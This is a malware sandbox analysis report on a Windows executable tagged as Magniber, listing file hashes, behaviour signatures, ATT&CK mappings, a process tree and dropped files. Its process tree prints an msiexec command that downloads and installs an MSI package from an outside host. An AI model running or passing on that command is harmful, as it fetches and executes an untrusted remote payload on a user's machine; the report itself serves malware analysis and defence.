89ed77bc82e00f793ed339285264cd3831a9250756a325efc99aed28454bc7a1

Analysis

max time kernel
129s
max time network
135s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
29/08/2024, 11:29

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2024-08-29_712b1f8a6dbb3a7ff6aafff2fdfa75c3_magniber.exe
Size

1.4MB
MD5

712b1f8a6dbb3a7ff6aafff2fdfa75c3
SHA1

f5368b31cccbdf60239f9b2ef77197e67c977757
SHA256

89ed77bc82e00f793ed339285264cd3831a9250756a325efc99aed28454bc7a1
SHA512

a4f416a3f51ebb3b4a4119fa7bb3f2c66385e8a489cfff3660f5b1b74d7d2f5430532dcb2967c94ed04ea411901dbfec71e8883289c22aa6e52be96d97c8983d
SSDEEP

24576:baQhJ+ARjUapcG+XgqbVUnqiYXla5XdMAyrlpdMrAj/LpEML:baK1R4apZwxQqRV8XK7Vj/LOML

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1472	~apxorojtx3.tmp

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
4892	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-08-29_712b1f8a6dbb3a7ff6aafff2fdfa75c3_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~apxorojtx3.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4892	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	4892	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4892	MSIEXEC.EXE
4892	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1396 wrote to memory of 1472	1396	2024-08-29_712b1f8a6dbb3a7ff6aafff2fdfa75c3_magniber.exe	87
PID 1396 wrote to memory of 1472	1396	2024-08-29_712b1f8a6dbb3a7ff6aafff2fdfa75c3_magniber.exe	87
PID 1396 wrote to memory of 1472	1396	2024-08-29_712b1f8a6dbb3a7ff6aafff2fdfa75c3_magniber.exe	87
PID 1472 wrote to memory of 4892	1472	~apxorojtx3.tmp	95
PID 1472 wrote to memory of 4892	1472	~apxorojtx3.tmp	95
PID 1472 wrote to memory of 4892	1472	~apxorojtx3.tmp	95

C:\Users\Admin\AppData\Local\Temp\2024-08-29_712b1f8a6dbb3a7ff6aafff2fdfa75c3_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-29_712b1f8a6dbb3a7ff6aafff2fdfa75c3_magniber.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1396
- C:\Users\Admin\AppData\Local\Temp\~apxorojtx3.tmp
  "C:\Users\Admin\AppData\Local\Temp\~apxorojtx3.tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://pliuht.cdnpckgs.eu/client/pkgs/99slot/99 Slot Machine20150310063043.msi" SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~apxorojtx3.tmp"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:4892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_isC9BD.tmp

Filesize
1KB

MD5
9cf56319d899884bb71618a6b9863751

SHA1
5ae45238fa649d14ffe6017a8a16ad95c6a3b47e

SHA256
e447b0aae62bf0ca5f5d879ebaa4871e9e995dfe43e3eff6b1f3772ee85764e5

SHA512
2725c986c1ec7b9ac28ce12ba16c7b903e6b20e5e3da172c4c398180b1a17f53e3c90fb652ad4e94342030f85f7a8e0954501ce34efaaa6a408f524dc0ac8c1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\{59D0265A-DC95-4A27-AA90-426BF1CB84CD}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{59D0265A-DC95-4A27-AA90-426BF1CB84CD}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~C9BA.tmp

Filesize
5KB

MD5
36b7364ebe9b3902621a9e5a259e899e

SHA1
b531c68d0dcd72e0c49111a5ff2acf6706bb2ae9

SHA256
79c3499c36b20c206fa0e9d4cc0a90ba1d816ecc702af49859d6f2a18724ea99

SHA512
af190fbd7af6eca018fe388b7e40fb259e5e45c13f0819897e47d08e28f3d7869455bf17829db96c93f9c44a5bc82ea93469fa03e6bb956374f419cec8f5f617

Download Submit
C:\Users\Admin\AppData\Local\Temp\~apxorojtx3.tmp

Filesize
1.2MB

MD5
ed24e819a77a953187ce05cc716ad378

SHA1
c866caac6a71cd5089ee57b89cc19d6c103930f8

SHA256
951d55c58558e2d7fbd92fd8d372f71bf99431dcb4e65f1be276c48e51a689f6

SHA512
f062bc8f378fc0a34d3201c91351c503957da310eacfbb37dbdd17d3ffdf38afcd039712a861377a0fe51f6c668cef8df33649aecefb698ec3c44855691a63cd

Download Submit